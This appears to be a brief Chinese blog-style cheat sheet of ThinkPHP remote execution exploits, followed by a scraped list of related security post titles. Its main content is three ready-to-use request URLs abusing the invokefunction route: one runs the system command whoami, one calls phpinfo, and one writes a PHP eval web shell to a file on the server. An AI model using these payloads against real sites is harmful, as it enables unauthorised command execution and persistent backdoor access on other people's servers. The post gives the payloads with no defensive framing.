Thinkphp(TP)

1.远程命令执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2.远程代码执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

3.getshell

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);?>' >1.php

相关推荐
virelin_Y.lin1 小时前
系统与网络安全------弹性交换网络(2)
网络·安全·web安全·链路聚合·lacp·eth-trunk
go_to_hacker4 小时前
安恒web安全春招实战
安全·web安全·网络安全·渗透测试
AI拉呱_8 小时前
医院行业等保2.0案例
安全·web安全
2301_810154559 小时前
纯真社区IP库离线版发布更新
web安全
帅云毅12 小时前
文件上传--解析漏洞和编辑器
笔记·学习·安全·web安全·编辑器·php
云天徽上13 小时前
【数据可视化-27】全球网络安全威胁数据可视化分析(2015-2024)
人工智能·安全·web安全·机器学习·信息可视化·数据分析
墨北x1 天前
网络安全职业技能大赛Server2003
安全·web安全
ALe要立志成为web糕手1 天前
create_function()漏洞利用
安全·web安全·网络安全·php·rce
K.A.L2 天前
熊海CMS Cookie脆弱
web安全
半个西瓜.2 天前
武装Burp Suite工具:xia SQL自动化测试_插件
安全·web安全·网络安全·安全威胁分析